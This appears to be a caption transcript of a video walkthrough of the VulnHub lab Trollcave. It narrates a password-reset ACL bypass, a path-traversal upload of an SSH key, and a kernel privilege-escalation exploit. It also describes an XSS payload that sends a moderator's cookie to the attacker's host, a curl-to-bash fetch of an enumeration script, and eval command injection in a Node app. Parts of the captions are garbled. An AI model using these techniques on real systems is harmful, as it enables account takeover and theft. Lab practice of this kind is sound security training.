Vulnhub - Trollcave 1.2

Captions
What's going on YouTube, this is IppSec, and we're going to be doing Trollcave from VulnHub, and pretty much I'm doing this machine twice. The first time around is going to be what I believe are unintended methods. A lot of the frameworks like Rails, Django, CakePHP, etc. suffer from mass assignment vulnerabilities and just weak permissions on route files, and I believe this one was just a weak permission on a route. So there was a password reset functionality, and the super admin user shouldn't have been able to get his password reset by anyone; however, the password reset was divided into pretty much two different functions, and the ACL was only placed on that first function, so if you just skipped that first function and went to the second one you could reset the super admin user from there. You upload a file to get code execution on the box; it's an SSH key, that's fully intended I believe. But once you get low priv on the box there is a kernel exploit for this Ubuntu version. The kernel exploit was kind of a funny story: it was a CVE back in 2017, Ubuntu fixed it, and then recently they had accidentally made themselves vulnerable again. So we'll do that kernel exploit to get up to root, and then we'll go back to the beginning of the box and go through the intended way, which involves some cross-site scripting and things like that. So let's jump in.

Let's just rip this box off and into an nmap scan. So we're going to do nmap, and then -sC for default scripts, -sV for versions, -oA to output all formats, we'll call the file initial-scripts, then since it's a local box on our local subnet we're going to do -T5 to make the scan go faster, and then the IP address of Trollcave, which in my case is 172.16.10.133. I got some error messages, I'm not exactly sure what these are; the host name looks valid, so I'm guessing this script, or the SSH script I was running with nmap, was expecting a host name, not an IP address, and that's why that showed. But when that finishes we have two ports open: SSH on 22 and HTTP on 80.

So I'm going to poke at HTTP because, well, there's normally not much we can do with SSH; HTTP 99 times out of 100 is going to be more interesting. So let's go over to the IP address 172.16.10.133 and we get a web page. So there are a few posts and we should be reading all those, but first things first, let's just map out the page. So we have three links: login, register (registrations closed). Well, again, let's try admin/password, see what happens: invalid username or password. We have online users as cooldude. It displays the newest members; if we click on a username we can look at the URL, it says /users/ and then 5, and it gets what looks like a user profile. So we have cooldude89 as a moderator; if we look at xer he is only a member; only me is a member. Let's try the very first user, which would be a user ID of 1: King is super admin. We have 84 hits; does it actually go up? Yes it does, so we've got a hit counter there.

So we want to look at all the users on this box, so we could use Burp Intruder or something like that, but I'm a huge fan of just writing quick Python scripts, because you never know where the script's going to take you, and if you have the skeleton already made you can do cool things pretty quickly. So we'll create the script, call it get_users.py, and we need the requests module and probably regular expressions, so import re too. And we'll do def get_user_by_id to create the function; response is equal to requests.get, the IP address of Trollcave which is 172.16.10.133, we want to get /users/ and then plus the ID, and then .text.strip. If we do username is equal to re.search, there's going to be a regular expression, response, and we'll get the first match. So we have to go to his profile by viewing the source and we can find out where we want to create the regular expression. So if we search for King, it's actually going to be easier if I just do this in the terminal, I like the highlighting better. So save this, curl, search for King, and we have four different spots. We have this link that links to a user thing; I don't like that because we also have them up here. I would suppose if we did "at the start of a line" we could use a regular expression here and that would be unique. uploads, I think that's his avatar. We have this send PM function, and this h1 for heading one. I think the send PM is going to be the best, because if we go to his profile page I don't see any logic why a profile would have a send PM button to another user, so that's going to be the unique thing on this page. As an example, if we had done h1 we can see there exist down here; if we did /users/1 we see it's a bit messy, so if we just do recipient name we only see that one match, so that is a clear winner for creating the regular expression. Copy this whole thing, Ctrl+C, go back to the script and we're going to match against that. So we want to do recipient_name is equal to, match anything, and end with a double quote, and then we're just going to return username, and then we will print get_user_by_id(1). If we did everything correct this should just say King. Line 5: Python's reading this as an integer, we want it to read it as a string, and there we go.

So another thing we may want to do is get the role, so get_role_by_id, and that will be the same thing, except let's see what it says: he's a moderator, super moderator, let's see, if we go to the page, super admin, we see right here. So that's going to be a hard one to match, so let's see, copy this, I'm guessing that's going to be \r\n. So we'll try this quickly, copy; I know Python does block comments somehow but I can't remember off the top of my head, so we'll just do this. We've got to match that, which is a bit more difficult, so let's see, response is equal to that, put this above this for clarity's sake, and let's try role is equal to re.search, and we can say bracket \r\n, and then maybe if we get lucky that is how the lines are being broken, and we can say this is response.group(1). Forgot to return it. And no, that was not the line break character. So to find out what that line break character is we're going to run curl again, pipe that to xxd, and then we can search for super to see if that comes back on a line: super, and there it is. So we can see just before that there's a period, so it can't display the ASCII; if we look here that is 0a, and then 0a is 1, 2, 3, 4, the fourth byte here as well, so 0a is that line break character. So if we edit our script, do I get role? No, it's still get users. We can do backslash, backslash x0a, and now python3 get_users, and now we successfully get the role.

So if we want to enumerate all users we can do for i in range(0, 20), there's over 20 user IDs, and we can do print get_user_by_id and print get_role_by_id. See, I can concatenate like this. Thank you again, we'll see. And we also have to specify i, there we go, see if that works. We got an error right off the bat for the very first user, and that's because it's starting at zero, so let's just do a try and then except, what does... do none. And now we have a user dump. So let's put that to users and try to log in. So we have dankman, Q, Teflon, Mr. Potato Head, so let's just try to log in as Mr. Potatohead. If we go to the login tab, Mr. Potatohead, password we'll say Mr. Potatohead, click login, and we get "you know..." which is interesting, because if that user didn't exist we get "invalid username or password", so if we put anything in this password field it's displaying something, which is odd. So I'm guessing this is like a password hint or something; not exactly sure what that field is, but let's try it with another user like xer, and his hint is different. So let's grab this text for every user.

So let's copy get_users to get_hints and we'll start off by creating a new function, so def get_hint_by_id, response is equal to, we can just copy this, okay, and actually payload, we probably have a lot of parameters we have to pass, so let's intercept this and see what is going on. So turn intercept on, well again, proxy, send to Repeater, go, and we want to see exactly where that hint thing is so we can create a regular expression to find it. So div id notice, how many times does notice appear? Just one, so this is going to be the regular expression we want to search on, so match. And looking at these parameters we see something that looks bad: authenticity_token. So this could be a CSRF, cross-site request forgery, token. And we keep getting a response back so I don't think it is. If we change the username to be, let's say, King, if we still get this notice back we're going to say this could be a cross-site request forgery token but the application's not accepting it, and that looks to be the case. So cross-site request forgery essentially would mean when the page generates, it puts a unique thing on that page, and then once you use it, the page will let us through that login thing and then delete the token, and what that does is it prevents people from being able to brute force, or being the victim of cross-site scripting attacks. I will link a video in the description of me explaining that a bit better, because we actually wrote a Python script to break that. But we can ignore it because it doesn't look like it's being used. The other ugly thing is we see this UTF-8, which is not ASCII characters, so I'm going to see if I can just remove this from the request, because I don't feel like putting hex or anything in. So it looks like we can just remove that. So let's unhex this so we can put it in our Python script, or URL-decode it, there we go, because if we send it into a Python program like this it may just say "oh, I'm going to encode these percents" and double encode it, which would be bad. So just copy that, payload is equal to that, and we just have to convert this to be valid. So that's relatively straightforward: what we're doing actually, King is not King, it can be a variable called username, and session ID, set some password, we're always going to log in with "please subscribe" because the password can be anything we want, commit is equal to, well again that looks good, the only thing we have to do is create that username, so username is equal to get_user_by_id and this can be id. Okay, response was a POST request, it was, so requests.post, this is /login, we don't have anything after that, and then to put the POST data in we do data is equal to payload, then we can return response and see what happens. get_hint_by_id, we'll just comment this out and only do one at a time. Invalid syntax, let's clean that up first, so we have one too many characters. Okay, go to the top and that looks bad: "The change you wanted was rejected" with a 422. If we look at the header of this I don't see that HTML head, so we have some error.

Let us send this over to Burp so we can figure out what's going on. So I'm going to remove this IP and put 127.0.0.1, and then in Burp we'll go to Proxy, Options, add a listener, we'll bind to port 80, send this to 172.16.10.133 on port 80, so any request into Burp on localhost 80 will get forwarded. So send this, intercept, send it over. That's not the right one, there it is, so something just showed up. So let's rename this to be Python and this will be called widget. So let's copy this thing to see if this looks the same: different length, D, that's good, session, King, password, the password is different, so that's why it's the different lengths. Looks pretty identical, so what else is different between these two requests? The cookie. So get rid of this POST, if we copy this cookie what will happen? So that's it, we've got to add the cookie. So copy this, go back to the script, we'll clear the cache of Burp, cookies is equal to that, and then just convert it how Python likes it: 32 session, yeah, cool, one, oops, okay, and then in the actual POST request cookies equals cookies. Okay, on this again, I think I reversed it, I want this to be cookie and this to be cookies, there we go. So go to the top and that looks much better, so now we can create that regular expression and then we'll have a script that dumps all the hints. So paste that, and then we can do hint is equal to re.search, and we'll do notice, a question mark, that, response, .group(1) or (2), and hint, and there we go. So let's see, for i, get_hint_by, let's see, we wrote two things, we'll return username and hint, and we'll do get_hint_by_id(0), that would be username. We'll make this prettier: username is equal to get_hint_by_id, let's see, I'll call this response, it's always tough naming variables on the fly, so response[0], that will be username, and hint will be [1]. Actually the cleaner way to do this would just be username, hint, there we go, we can do username in, try this, and that works. See, that may make it a little cleaner, perfectly, just do a tab I guess, to hints. So now we would probably create a Hydra list based upon these hints, but I don't think it's going to be useful, and we'll just ignore it for now. So that whole thing was a fun rabbit hole just to go down; it doesn't actually do anything in the box to my knowledge, it's just there for fun.

So the next thing I did on the box, once that led me nowhere, was went back here and started reading the posts, because I had Hydra going in the background and it never came back with anything. So it may just be me failing the Hydra command, which is why I'm not showing the Hydra command, because it could be something with that authenticity token, so I don't want to show something that maybe broke and I don't know. Hope that makes sense. But I started looking at all these blog posts and reading them. So this is just saying what the web page is, and then we have a password reset blog post. So he says he's implemented a password resets resource in Rails and it's about 90% working, except for the email thing. So if we search for this, resource password reset rails, we go to a Rails tutorial, and let's see, is this paid content or not? Doesn't look like it is, so we can read this and see how this function works. So we have a GET request to password_resets/new; if we do a POST request to password_resets it does something that's not a GET, oh there we go, there is a GET here as well. So let's go to that URL, see what happens, go, it doesn't exist. Going back here we do have a /new, so let's see what /new is: to create a new password reset request, and we get something. So the very first thing I did was try to reset super admin's password and we get "can only reset normal members' passwords". So we can't probably do mod and we can't do users. So let's verify that by just counting our users and getting a mod: cooldude89, register, nope, back, back, strike, cooldude. So that is true, can only reset regular users' passwords. So we do xer, click reset password; email's not working so he's just printing out the magic reset link. So if we open this in a new tab we can change xer's password, and the first thing I did was I tried changing this to King, and I think this is an unintended route, and now we have bypassed where the ACL was. So on this last /new request he does a check on King; on the new request it's not King, it's xer, let's say, it creates a reset link; however, this reset link doesn't have the ACL applied to it, so if we specified King we can reset King's password. So let's put the password as password, click reset. And we will be showing the intended way to do it after this, it's just a little bit long, so I'll do the method I had done first and then explain how I found the actual intended method afterwards. Click reset, and I think my web browser hung so I can't click anything. There we go, yeah, it did hang. Password too short, minimum of 10 characters, so we do password1234. It's odd that my browser hung, a little concerning, but not too much. Password has been reset and it just logged us right in.

So we can see all the different options we have. If we go to inbox we have no messages; we've got a file manager, we do have files. So the first thing I did was try to upload something. So if we go to Documents/vulnhub/trollcave, let's upload a PHP file, so cp shell.php cmd.php here. So that file looks good, let's select that, my VM is going slow, give it a name, we'll just do cmd.php, click upload file: uploading is currently disabled. So click around here, we have a button to enable file upload, so let's do that, save settings, and then we can go to file manager and retry that request. File was uploaded, so now we have to find out where this file is. So we get a file manager, user file /1, it starts showing where the file name is, 2, 3, and it doesn't look like there's any ACL because we're hitting other users' files. So skip around, at 5, 10 we error out, and let's go to 8 and that's where cmd.php is. So it's in uploads/King/cmd.php, and let's check that out. It just prints this because the web server doesn't actually have to generate any PHP content; PHP is probably not installed or nginx is just ignoring PHP. So that's a dead end, but if we do have a file upload I wonder if we have any type of path traversal. So let's go back to this request, HTTP history, uploads, let's just try doing, let's again, POST, this is probably file upload, so let's do filename is equal to ../cmd2.php and let's see, change it here as well, click go, looks like it uploaded fine. If we go back, let's see, user files, 9 will be the next one we uploaded, and now it uploaded to just uploads/cmd2.php. So we know that this script is vulnerable to path traversal, because if we go to public/uploads here we escaped the King directory, so we should be able to put files anywhere we have write access on the server.

And if we go back to home and start reading things there's another hint on what to do. If we go to new features for moderators, no, password reset, now markdown threads, oh there's more, person, now that we're at, man, let's see, blog clearance, the king is dead long live the king, I think this is it, nope, sudo, give me sudo. If we read this post we have heard a guy saying he's logging in with the rails user interactively, and this blog post looks like it's Rails; if we looked at other things I think I may have said it, if not, through the post, you know this server is Rails and we know there's probably a rails interactive user. So what I'm going to do, my VM actually listens, go to the terminal and we'll do an ssh-keygen -f and we'll create a rails key. So now we're going to upload rails.pub to the web server, and I'm just going to name this, whoops, authorized_keys. Go back here, file manager, upload authorized_keys and we'll say ../ a bunch of times then home/rails/.ssh/authorized_keys, just taking a guess in the dark of where the rails user directory will be. We could probably pull it from that environment variable, let's try that real quick and grab $HOME, okay, let's try this, we did $HOME like this and if this is going to upload we'll, I doubt it, but we can see, something went wrong, so I don't think we can use environment variables there. So let's just do home/rails/.ssh/authorized_keys, upload, says the file's uploaded. If we go back to 10 we see the file authorized_keys is in /home/rails/.ssh. So chmod 600, so let's rename that to rails, to rails_id_rsa, id_rsa-rails, to make it more of a "hey this is an SSH key" based upon the file name, but ssh -i id_rsa-rails and then rails@172.16.10.133, and it lets us log in right away.

And the very first thing I noticed was Ubuntu 16.04.4, and off the top of my head, because, well, we do Hack The Box and whenever kernel exploits come out we have to patch or be aware of them, I know there's a kernel exploit for this particular Ubuntu which is relatively recent. If we search when this kernel was, this is actually the thing I saw, 116, 116 stuck in my head. If we look at that Ubuntu kernel and see when that release date was, it's probably this one, do we have a date? Come on, I don't see a date here, there's no date on that, awesome, try this one, last one, let's see, date here; if not you'll just take my word this kernel is a 2018 kernel. Because kernel privesc was not the intended method of this box, but let's just pull up the exploit. So let's go to Firefox and just google "latest ubuntu privilege escalation", and it's this second link. It's actually funny, it's a CVE from 2017, because Ubuntu accidentally reintroduced an old vulnerability, and if you want to be patched without updating, that's the command you run; it is now patched in the latest, so if you have Ubuntu servers you may want to update. So if we just do, let's see, where's that CVE, we went, searchsploit for the CVE number and pull up the source code, so searchsploit, no, let's see, searchsploit -h, do they have a CVE thing, see, 2017, 95, no, title, update, examine, maybe it doesn't have a CVE, just google it, exploit-db.com, CVEs, there we go, should be good, that's our kernel version 116, click raw, copy, check our box, do we have gcc? We do not. So let's vi, what's this called, don't know, we'll just call it exploit.c, set paste, paste it in, gcc it to compile, base64 the exploit, go to the beginning of the line, highlight everything, get to the SSH terminal, yep, SSH terminal, vi exploit.b64, yeah, that's not the right clipboard, that is, base64 -d this. I probably could have just scp'd it because I have SSH keys, but habits die hard. +x on exploit, I did everything correct, we're now root by just executing that. So go into /root and now we can get flag.txt if we want to.

So that is the unintended way to get user and the unintended way to get root, pretty fast. And I was confused because there's a lot of users on this box: cooldude, dave, dragon, king, rails, so a lot of work went into it, and I'm just, because that was like, there's no way that this was a kernel privesc. So I went to poke around the web app a little bit and I noticed this coolguy thing, and if we look at the JavaScript we have him getting a page, coolguy_mod.rb, like every X minutes. So I knew I had done the unintended way to do everything, because why would coolguy_mod be getting a page every few minutes if I could just instantly go up to super admin, or even like reset, is it coolguy or cooldude, one of them; if I could just reset his password why would he be getting a page? Because that just screams some type of cross-site scripting attack. So get out of my shell and we will begin doing this the intended way.

So let's go back to the Trollcave web page, and is there a logout button, there it is, and just keep reading the posts. So if we look at this politics and religion thread we have it posted by cooldude89, and cooldude89 is a moderator and he will be monitoring this thread very closely. So let's see, we have to figure out a way to put something in the comments. So if we went to that reset password page we could reset a user, so if we follow this link, let's reset a standard user's password, just do password1234, reset, okay, logged in as the user, and he may be able to do file management, upload, but that feature was disabled, so I'm not even going to poke at that right now as this user. So we can post comments now as a regular user, so let's do script, was it javascript: alert(1), I think that's it, was it just alert(1), I'm horrible with cross-site scripting, see what that says. We don't see any scripts, see, javascript alert, so it looked like "script" got taken out; it's definitely some type of regex because it left alone this script. So let's see, are there any ways we can bypass that expression, no, see, so let's just verify it by doing script and we can do cases, first comment, see, script should be right around here, I think we should have put something else in there, let's do that, I am not doing that well, so script, script, testing the cases, and please sub, search for that string in the page source, and we see script actually made its way through. That's odd, so does the script only not work when there's a /script? Yeah, where's my web browser, it's doing so slow, comment posted, refresh this, oh I think I really screwed up the comment system because I'm not even getting comments anymore, test, I left some tag open, nope, there we go. So let's try this again: script, script, please sub, and we'll do /script, it's invalid but who cares, test this one more time. So it filtered out both of those, so all the way up here it was because it was contaminated from another script I think, and why it's set, the one with just /script, that's when it fixed itself. So we have it now filtering both of those scripts, so let's see if it's a recursive filter. So if we do s, and then we do another script, and then cript, we can test this. So what that's doing is, if it only does one pass through, it's just going to erase this script and then leave this one intact. So we'll see if that works, please sub, Ctrl+U, and it did some type of weird HTML entity encoding. So we could keep playing around with that, or just not use "script" in a JavaScript payload, and just not using "script" is probably the easier route to go.

So let's go back and create a different JavaScript, so we'll do it in an image: img src is equal to nothing, onerror, we'll do, on error create an XMLHttpRequest, so we'll do req is equal to new XMLHttpRequest(), okay, then req.open and do GET to make a GET request to us, so 172.16.10.168 I believe, and you do document.cookie, I think that's right, and then req.send, and that image, let's clean this up real quick before we send it to make sure it looks right with actual line breaks. So on here we're going to create an XMLHttpRequest, that request is going to open a request back to our server, and that's going to send the cookie as part of the URL, and then that send. That looks correct, so let's see if this request works, and we're going to have to do python -m SimpleHTTPServer on port 80; it's in use, what is being used by 80? Burp, let's turn that off, options, there we go, that listener, there we go. So post this comment, and I don't think I'm that IP address, I should have checked that before, no I am, or if there's an error in my request: new XMLHttpRequest, okay, request.open, that looks good, it's going to be a GET request to 172.16.16, darn it, ping 172.16.10.16, that's no one, so the easiest way to fix this is change my IP address. Okay, now refresh, 172.16.10.133, why is it unreachable, it's on the same subnet, 172, we'll fix the IP, that's annoying, dhclient eth0, it's good, no, my IP, why won't it give me my IP, ifdown eth0, what, something odd is going on, story of how a typo destroyed everything, ping myself, pinging the gateway, ifconfig, easy, 172.16.10.16, netmask 255, let's just change it to 168 what it should be, unreachable, it's up, now we're unreachable, dhclient again, eth0 -v, verbose, listening, okay, we got an IP of .111 and I can ping out. Okay, let's go back to Burp and change the IP address, should be history, there's a lot of things to that, let's see, it's probably a POST, we can just click back a few times and get here, okay, see, where is that, comments, now I guess we can just recreate it, Ctrl+U, now we have to go to politics and religion, draw, you, requests, okay, and we copy this, paste it, and put a new IP, I think three ones, let's not make that mistake again because that took us down a weird hole. There's common, comment posted, now place on, python -m SimpleHTTPServer on port 80, I click go, let's see, got that, and I got my cookie.

So now we finally have the cross-site scripting working, and it's just a waiting game to see if cooldude hits this. If he does we can then put his cookie in place of ours and attempt to hit the page, and we'll probably be his user account. And there we go, we got another cookie, and this time it's coming from .10.133, which is cooldude's IP, or not cooldude's, um, the IP address of Trollcave. It looks like we have multiple cookies, that's odd. So let's go to this window, who is that? It's cooldude right now, coolguy, cooldude, cooldude89, paste this, once the cookies are separated by, I just put this in Burp to decode it, Decoder, smart decode, did that work, almost like it did. So we got 32 session, this long string, and this got --, a hash, and then remember, again, this one's kind of the same thing, so we've got two different 32 session cookies, we'll try them both. If we copy that, then go to Firefox, and do we have a cookie editor plugin, Web IDE, Tools, Cookie Manager+, search for this 32 session, we'll edit this, as my cookie, paste it in, that looks wrong, won't see, doesn't look right, but it is okay, it's just weird how it has -- in the hash, but now we are cooldude89, everyone, moderator.

And if we were paying attention we could have seen one more thing pop up, I'm not sure what it was, maybe post blog, so we can post a blog visible to anyone, moderators, regular users, members, so looks like we got something to enumerate: groups. So let's turn intercept on and see what that is, is that just a number, see, here's the post blog, so it looks like it's the clearance, send to Decoder, smart decode, it's got that UTF-8 thing which forces it to go to hex mode, so we can just delete that, and we got blog clearance equals 1. So if we drop this request, go back, turn on, let's make it visible to moderators only, there's blog, and we got clearance is equal to 3. So we know we have different groups now, so we can do groups, mod is 3, guessing last one was everyone, so let's see, it's 2, back without changing anything, yes, regular members, let's see what they are, regular members is 2, we need to drop the request, I could probably just look at the source code, there we go, that's a bit easier. So now we know all the group IDs; I'm not sure if that's helpful but it's good just to save it in case it is. See, is there anything else he has, looking at his inbox, why is intercept still on, no messages, file manager, reports, so it's just looking like you could report a user for doing something bad I guess, so that is the password hint as we have there, there's an avatar, some email, see, a user by, in, should be something unique that coolguy can do, or cooldude.

Let's go back to home and see what new features for moderators: to appoint moderators, this can be done through the users page by clicking the mod link next to the username you want to promote. So if we try to promote someone, there's no promote link, back, okay, if we just go to /users, not an actual page, we have a promote link, I think against non-mods, so remember, yeah, mod, so if they're already a moderator that mod isn't there, but we can either ban users or we can make them a mod. So let's intercept that request to see exactly what happens, mod notanother, sure, and let's see, what did that do, users/14/mod, click forward, whoops, was that last request, I was just to get on users, so notanother was promoted, see, intercept off, regular member, and notanother is now moderator, was that the only click, it's one of many ways, there we go, yeah, so we have moved them to a moderator. Let's see, is there an option to unmod, copy the link location, users/11, so let's see what user was notanother, /users, notanother is a member, I didn't put the ID number, them, get users, let's do that, python3 get_users, did I just die, why isn't that working, I really only changed this print, let's see, str, there we go, okay, so notanother is 14, so let's try changing it to 14, see if we can promote notanother to something else, see how this mod function works, it doesn't exist, or do mod, if we go, less groups, try for 4, maybe above admin, nope, that doesn't work. Let's go in the history and see how the mods were working, let's promote someone, intercept it, that'd be easier, so go back, part of this, you are now going to be a mod, okay, okay, so it's not a GET request, it's a POST request I think, turn off there, see, Teflon was 14 I think, okay, we can just promote Artemis again, we'll leave it at 10. So go back to users, Artemis is a regular member, wait what, wasn't she a member before, okay, so there's member, regular member, and admin, it looks like, not again, okay, she's a moderator, so there's no mod link on moderators, but what if I just click go and send that link again, and now she's an admin. So if we use the mod on a moderator they get promoted to admin. So let's do it on ourself, cooldude, cooldude is number 5, so 5, promote, we're being redirected, refresh, we're still just moderator, so follow redirection and click render to view the page, doesn't print well, see, I don't see the error message but I'm guessing we just can't promote ourself.

So let's just do the password reset on Artemis and log in as her, so she is 10, you don't even need that, we just copy, go, let's do a new private window, well again, we need password reset, /password_resets/new, Artemis, and "can only reset normal member passwords", okay, so let's reset Ian's and then we'll log in as him. I don't know, I closed that, they can't need a window, so let's do password_resets/new, Ian, I just really grabbed another moderator, Ian's a regular member, so we need I guess member, anybody, home, what user, that's easy to type, xer, anybody, did his as well, so yep, so there's this, strange, member and regular member, member is lower, so password1234, reset, okay, let's promote him. So we can just intercept this request, mod, send to Repeater and send this a few times, okay, we have modded the crap out of him, so let's see what he is, intercept off, refresh, he is now an admin. What can admins do? Doesn't look like really anything else. Let's go to users, there's an unmod, so we can take admin privilege away from someone. So what happens if we unmod King? So King would be 1, so let's intercept this request, demote Q, do 1, can we unmod the King, and drop that, refresh, King did not change, see, well, send that a few times to just demote the crap out of him in case he has like two different groups, because we promoted the crap out of our user and he was still only admin, so maybe super admin is hard-coded in, and now King could be a regular user in the database but still displayed as a super admin. So let's log out of the guy, do another password reset on King, can we reset his password, "can only reset normal user passwords", so no we cannot, and let's verify King is indeed 1, he is 1. So let's actually follow and do it all through Burp because we may be getting an error message that we're not seeing, so xer, password1234, login, let's go to users, proxy intercept, demote Q, change this to 1, we aren't putting anything down there, forward, and turn intercept off, and we can't do that to the super admin.

So let's see, so my browser is hung, can I scroll down, there we go, read this post, so we know King left us, thing for service, no news, super admin in place, and said King's account will be granted to yours truly and will be used sparingly until his return. So let's get on dragon's account because dragon says he has access to King. So if we go to dragon's account, let's see, users, dragon's an admin, so dragon, 3, let's demote the crap out of him, Repeater, unmod 3, so now dragon is only a member, so we should be able to reset his password, so password_resets, dragon, and we can, but we want this super secure password1234, and now we are on dragon's account. So let's check things out. If we go to his inbox we have, let's see, subject is password, and we have King's password here, and we changed King's password through the unintended method so I can't log in as King, but this is how you're intended to get King's password, is through this method. So let us now just jump on SSH and do the privesc the intended way, so
ssh - i IDRs a rails ray at 172 1610 133 so poking around let's see the first thing I would do on this box before we get into the probe ask is look at the troll cave we can go to been not been config and look at database dot y mo y ml and we can see there is a Postgres server and there is SQL light so production sounds good so let's access this Postgres server so if we do a net stat - a Ln P grab for list for listening ports we have Postgres running on 5 4 3 2 that is the default port for Postgres we also have something running on quad 8 which is odd I don't know what that is well I do but that is unique so let's look at Postgres so we're going to hit the squiggly which is this key and you have to do this as part of a new line so do that hold but hit that squiggly I just said and then do C to drop into an SSH prompt and we can do we can do help to see what it is but this shows us different ways we can do port forwarding in SSH so instead of just Xing out every time and then doing SH - L that's just a shortcut to get into the SSH menu so again it only works as soon as you get to a new line but that's the keystroke you hit hold shift and hit the I think that's a toad a and then C against this menu they can do - L we want 5 4 3 2 localhost 5 4 3 2 so what this did is 4 point 5 3 2 5 4 3 2 on a local host to this server through an SSH connection and pointed it to local five four three two so now I can load up database beaver which is a GUI to access a lot of different types of databases and I'll probably have to delete a connection nope so we can just do clues let's delete this connection real quick and create a new connection so if we create new connection we can name this PostgreSQL next is a username we can get this out of that yellow file it's going to be TC and here's the password ok connection type we could say production I don't think that matters actually but we can access this go in schema go on public tables and there's nothing here so this database looks 
like it's empty so maybe it's still in the development stage so let's go back and it's in DB directory so CD CD DB let's see there's nothing in tests there's stuff and development dot sequel a 3 so we can do sequel Lite 3 development I'm gonna do like dot tables to list the tables we can do select star from private messages to see if there's any private messages we missed we could also select star from users get a bunch of password hashes this is actually a relatively secure format as be crimped so probably won't be able to crack those maybe with the password hints we could you get us to do dahm but just things to look at as you're going through so if we could uh let's see PS - TF well just do Linux e number a enumeration script let's see what that shows us so CP Linux pretty esque when enum got SH Python C no no Python am simple HTTP server it's on 8,000 so cool 172 16 10111 when UNAM sh pipe to bash and we can run through this once this script finishes that should be good enough to start looking at so let's go to the top wit ran min starts going down we have the kernel information which we know this was exploitable first name troll cave user group king is logged in on TTY that's odd I wonder if we could get that password I don't know maybe I'll get that password won't check who else has logged in the rails user I guess it depends how he logged in coda guy see proc su ID so files not own there's a lot environment variables networking ports let's look at what's there and by root on process list something maybe here maybe not so before I begin all right start going down I just want to check out something real quick to see if King's passwords are there so if we do get hub mini penguins see is this it from the current linux user well the current Linux desktop that's not gonna work ought to dump passwords see is this going to do it actually we're not rude so we can't do that I don't know why I was thinking we could just magically dump the password and where's this bar 
here let's get rid of this bar that's ugly so let's see let's check out what port 888 was so cool localhost it's going slow for eights and we see it is a web page so all right off the bat let's just for this point two dash L for 888 on my machine to there so now if I go on localhost for eights we get the Kings calculator if we click calculate we get an error message if we get rid of that encoding I think that should work and we have crashed the program at which case it takes a few seconds to pack up there we go so it doesn't like any type of encoding we do one space one what happens yeah it's treating spaces as plus and for some reason if we send the program a plus send it to be to be encoded then it gets a plus and freaks out I guess it's a very buggy program so let's say we can find that source let's see it's as calc so let's see fine / - name calc davin all and we got something in home King calc so if we go to home King go in calc we got calc JavaScript so let's look at this we have them we do so this looks like a node.js thing we have something commented out because of a security risk let's make sure this is the one that's running because perhaps the calc is running out of a different location we don't have access to and this ping function still exists so if we case to ping let's see cool localhost let's just end this - Bert use the tool how it's meant to be used says - repeater we get - so that works get slash ping not found if we get calc and do nothing it airs out so we can deduce that this is probably commented out on whatever is running so let's keep going down the code see if anything sticks out we do have a case for calc a case default and default displays 404 so calculate the only thing we want to do and the function of calc is going to do some split the query on equals so I'm guessing our payload can't have any equals in it that's a bad character and we get a eval down here so evil is generally really bad we can just execute code so if we write 
JavaScript to execute a command I'm guessing we can get this too so let's see what would be a Java nodejs so we can do no js' hello world bye guy turn intercept off so we can look at the function for node to print something res dot send is how you print and this so let's try that repeater see get calc was it some is equal to res dot send hello see what happens looks like it crashed we didn't get anything back so we can try console.log see if that does anything nothing wait for this start working and then we can try just executing commands next when reset there we go let's back up so let's just try a way to execute commands I was open the hello world would actually work and we could have a proof-of-concept but let's just jump straight to the good stuff so let's do require shy old process and I just got this through googling different ways to execute commands through JavaScript dot spawn you can do Who am I if we send this we get an object back so I couldn't get it to actually output the string but we can and do something like touch and then spawn requires arguments bet like this so slash tab test I think that's right Victor so if we look at this and go to slash town there's a file called test and it's owned by King so let us get that set UID program that we did and pretty much every other video where we use set UID come on in here I'm clicking and there we go not to rebuild this VM or something because certainly go slow and that weird thing with the ethernet adapter I guess something got hosed anyways let's go to opt shall set u ID and we can copy this to ya if we look at the code it's just gonna do a set UID and then execute then Sh so let's compile that exec see compiling here because we don't have a compiler on which we'll call it troll cave it didn't have GCC on it so we could probably just add the set u ID bit too like VI or something and do it that way but this is just as easy so we do melt crap no soo in let's see rap on slash temp slash temp doesn't have the 
new set UID bit set so we can just create this so call this King taste and let that's the first time actually did the correct pace first try decode this we do dot slash King chmod plus x king okay the program works so go here we will do a CH own and we'll try King King on tab King and that did not work specify it like this did not like that did not like the space one bit [Music] can we do it like this let's get back to what we were look here's a tape well touch okay we got object object send this to a new repeater so we can always give back to that CH rep King 1000 so grab 1000 Etsy group it is king and what if I just don't know how to pass multiple arguments this way we do it in single quotes CH own King King to temp King I almost had a typo oh no I still didn't run the CH own which CH own will do a slash bin specify the full path should need to nope so let's just do run need on SH CH own King King tap King and chmod plus s tap King let's say we can do this so - and specify just tap Rodney dot Sh still owned by rails let's change this to exec temp from a sh Peter slang for a second huh and it's still owned by rails so that should have been executing so let's see what if we go back and we try to do move tap King to tap King - that can work no the run read on SH touch slash tap will do pwned so that's going to tell us if the script ran and I guess we can send error messages to tap pwned okay let's try this again exact temper on me click go LS - la we got pwned but it's still not taking ownership of the King binary which GCC doesn't exist Oh duh King isn't a root user so if we see Peking to /home King let's see veer on me let's see P temp King to home King shell oh um King shell and we can say set UID bit read write execute and read execute to everyone else I think that is get rid of this so King could it just take ownership of temp King because he's not a root user so we should be able to do this actually let's see oh we ditched it this way temper on me click run go 
to /home king we got shell shell was owned by King and it doesn't have the set UID bit let's just do + yes chmod should did it don't need those lines click go still no set UID so maybe no set UID is on the home directory No that should have worked uh-huh you don't execute read execute execute CH own I do something really stupid no chmod I did do something really stupid flash home King shell thank God I'm almost done this video making mistakes left to right now okay l SLA we have the shell and owned by King we got set UID on it but it still didn't put us as king which Ben Sh go away Ben Sh it is going to - natural way to switch to the King user actually I think I know king is 1000 so let's change the set UID program I should do like it get you ID right there if this is the actual problem so then that number becomes dynamic I don't have to worry about doing a set UID every single time I change that number every time I want to run this program but I don't remember actually having to do that so that's odd pasted 864 dash D temp shell to shell computers lagging for a second there we go okay temp run Meade SH we need to modify this so CP Tapsell - King shell and now we can do what do shell 2 and CH own King King there we go now if I click run me know SLA we got shell 2 I think I screwed up with that s you gotta give execute temper on me was it four seven five five you know do seven five five it won't wipe that bit we'll see will you wait yes it did so let's do four seven five five we can do plus s now plus s okay now we're king so that number does matter I'll have to fix that she'll to actually get the uid beforehand I think capital S maybe like super set you idea what sets the UID and group ID Oh No okay I want to do sudo - L and we can see King may run any command so if we do sudo su - now we are root so that is the intended way to do that box take care guys
